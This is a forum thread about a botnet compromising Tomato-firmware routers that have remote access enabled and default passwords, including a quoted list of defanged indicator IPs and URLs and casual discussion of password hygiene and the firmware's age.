Routers running Tomato firmware under attack

Monkey34

[H]ardness Supreme
Joined
Apr 11, 2003
Messages
5,107

Nobu

2[H]4U
Joined
Jun 7, 2007
Messages
3,670
I would think that remote access would be disabled by default...or are they saying people are enabling remote and keeping the default password? o_O

Why do they even have a default for remote? It should force you to pick one when you enable it, or at least lock you out of remote access with a message saying to change the password in the config....
 

SFB

[H]Lite
Joined
Feb 21, 2011
Messages
67
https://www.linksysinfo.org/index.php?threads/muhstik-botnet-targeting-iot-devices-including-4-600-tomato-based-routers.75136/

joew333 said:
The risk is present if you 1) have remote access turned on in Administration (which is not a default setting) and 2) you also have the default root/admin user/password. No systematic security issue was found in Tomato, just bad password management by some users.

If you see any of these IP addresses or domains in your system log, you may have the infection.

46.149.233[.]35
68.66.253[.]100
185.61.149[.]22
hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr
hxxp://159.89.156[.]190/.y/pty1
hxxp://159.89.156[.]190/.y/pty3
hxxp://159.89.156[.]190/.y/pty5
hxxp://159.89.156[.]190/.y/pty6
s.shadow.mods[.]net
 

Darunion

2[H]4U
Joined
Oct 6, 2010
Messages
3,955
I honestly didnt think this was still a thing. I remember trying tomato on my wrt54g back in the day. So the last official update of it was 9 years ago? Looks like project was taken over by another team and their last update was 2years ago? Not trying to be a dick, just what im googling shows it is pretty old at this point.
 

Lakados

[H]ard|Gawd
Joined
Feb 3, 2014
Messages
1,948
I would think people that go through the work to install a 3rd party firmware on their router they would be smart enough to change the default password.
You would think so.... but back during my time in the trenches I went to many locations that were using Tomato or DDWRT and they still had the defaults. Businesses were the worst for this.
 

ThatITGuy

Limp Gawd
Joined
May 5, 2017
Messages
344
You would think so.... but back during my time in the trenches I went to many locations that were using Tomato or DDWRT and they still had the defaults. Businesses were the worst for this.
If you change from defaults then someone has to remember or keep that documented. This can cause problems when you treat IT (people) like a commodity.
 

SFB

[H]Lite
Joined
Feb 21, 2011
Messages
67
I honestly didnt think this was still a thing. I remember trying tomato on my wrt54g back in the day. So the last official update of it was 9 years ago? Looks like project was taken over by another team and their last update was 2years ago? Not trying to be a dick, just what im googling shows it is pretty old at this point.

Tomato is alive and well. The current branch(s) are known as "FreshTomato".
 

tangoseal

[H]ardForum Junkie
Joined
Dec 18, 2010
Messages
8,266
I cant imagine anyone is actually still using those old WRT54G routers with tomato on them are they?
 

nilepez

[H]ardForum Junkie
Joined
Jan 21, 2005
Messages
11,607
I cant imagine anyone is actually still using those old WRT54G routers with tomato on them are they?
I quit using mine years ago, but that was mostly because the R7000 was on sale for 100 bucks at Wally World. But honestly, until I started ripping my 4K disks to my NAS, I rarely needed the extra bandwidth (and I suspect most people don't have a drive that can rip 4K disks (or if they do, they either don't have 4K disks or they aren't aware that they can).

But this thread does have me thinking about trying Tomato again on the R7000 :D
 

pillagenburn

[H]ard|Gawd
Joined
Oct 3, 2006
Messages
1,070
hah! they would never guess my admin creds with my username/password of "fuck" and "yourself"
 

nilepez

[H]ardForum Junkie
Joined
Jan 21, 2005
Messages
11,607
hah! they would never guess my admin creds with my username/password of "fuck" and "yourself"
Barely matters if you don't allow remote access. I'm not sure if I've ever allowed remote access, but if I did, it's rare and temporary.
 
Top